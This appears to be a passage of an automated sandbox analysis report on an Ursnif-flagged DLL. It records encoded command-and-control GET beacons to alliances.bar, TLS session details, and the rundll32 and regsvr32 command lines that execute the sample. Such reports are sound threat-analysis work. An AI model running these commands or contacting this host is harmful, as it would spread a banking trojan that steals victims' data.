                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.349776195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.579535007 CEST3576OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.349809195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:31.479604959 CEST6735OUTGET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.349811195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:31.663826942 CEST6737OUTGET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.349821195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.369296074 CEST6862OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.349822195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.413059950 CEST6863OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.349824195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:53.492652893 CEST6864OUTGET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.349777195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.657140017 CEST3577OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.349778195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.697463989 CEST3579OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.349779195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.835757971 CEST3580OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.349780195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.898238897 CEST3581OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.349781195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.957025051 CEST3582OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        7192.168.2.349782195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:51.417496920 CEST3681OUTGET /jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        8192.168.2.349795195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:57:14.924638987 CEST6590OUTGET /jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49808 | 195.110.59.2 | 80 |
Timestamp | kBytes transferred | Direction | Data
Jul 27, 2021 10:57:31.403364897 CEST | 6735 | OUT | GET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                        Accept-Encoding: gzip, deflate
                                                        Host: alliances.bar
                                                        Connection: Keep-Alive


                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 27, 2021 10:55:44.309129953 CEST | 104.20.185.68 | 443 | 192.168.2.3 | 49734 | CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Fri Feb 12 01:00:00 CET 2021 | Sat Feb 12 00:59:59 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:44.309911013 CEST | 104.20.185.68 | 443 | 192.168.2.3 | 49735 | CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Fri Feb 12 01:00:00 CET 2021 | Sat Feb 12 00:59:59 CET 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:44.751471043 CEST | 172.67.70.134 | 443 | 192.168.2.3 | 49738 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Tue Oct 06 02:00:00 CEST 2020 | Wed Oct 06 14:00:00 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:44.751939058 CEST | 172.67.70.134 | 443 | 192.168.2.3 | 49739 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Tue Oct 06 02:00:00 CEST 2020 | Wed Oct 06 14:00:00 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:45.141944885 CEST | 172.67.69.19 | 443 | 192.168.2.3 | 49742 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Apr 21 02:00:00 CEST 2021 | Thu Apr 21 01:59:59 CEST 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:45.141978025 CEST | 172.67.69.19 | 443 | 192.168.2.3 | 49743 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Apr 21 02:00:00 CEST 2021 | Thu Apr 21 01:59:59 CEST 2022 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 |  |
Jul 27, 2021 10:55:45.163145065 CEST | 142.250.186.70 | 443 | 192.168.2.3 | 49740 | CN=*.doubleclick.net | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | Mon Jun 28 03:33:50 CEST 2021 | Mon Sep 20 03:33:49 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | CN=GTS Root R1, O=Google Trust Services LLC, C=US | Thu Aug 13 02:00:42 CEST 2020 | Thu Sep 30 02:00:42 CEST 2027 |  |
 |  |  |  |  | CN=GTS Root R1, O=Google Trust Services LLC, C=US | CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE | Fri Jun 19 02:00:42 CEST 2020 | Fri Jan 28 01:00:42 CET 2028 |  |
Jul 27, 2021 10:55:45.163212061 CEST | 142.250.186.70 | 443 | 192.168.2.3 | 49741 | CN=*.doubleclick.net | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | Mon Jun 28 03:33:50 CEST 2021 | Mon Sep 20 03:33:49 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | CN=GTS Root R1, O=Google Trust Services LLC, C=US | Thu Aug 13 02:00:42 CEST 2020 | Thu Sep 30 02:00:42 CEST 2027 |  |
 |  |  |  |  | CN=GTS Root R1, O=Google Trust Services LLC, C=US | CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE | Fri Jun 19 02:00:42 CEST 2020 | Fri Jan 28 01:00:42 CET 2028 |  |
Jul 27, 2021 10:55:50.657478094 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49755 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |
Jul 27, 2021 10:55:50.657537937 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49753 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |
Jul 27, 2021 10:55:50.663152933 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49757 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |
Jul 27, 2021 10:55:50.663324118 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49756 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |
Jul 27, 2021 10:55:50.664096117 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49758 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |
Jul 27, 2021 10:55:50.710814953 CEST | 151.101.1.44 | 443 | 192.168.2.3 | 49754 | CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | Wed Nov 25 01:00:00 CET 2020 | Mon Dec 27 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0 | 9e10692f1b7f78228b2d4e424db3a98c
 |  |  |  |  | CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US | CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Sep 24 02:00:00 CEST 2020 | Tue Sep 24 01:59:59 CEST 2030 |  |

                                                        System Behavior

                                                        General

                                                        Start time:10:55:36
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\direction.dll'
                                                        Imagebase:0x3f0000
                                                        File size:116736 bytes
                                                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:36
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
                                                        Imagebase:0xbd0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:10:55:37
                                                        Start date:27/07/2021
                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\direction.dll
                                                        Imagebase:0x340000
                                                        File size:20992 bytes
                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, Author: Joe Security
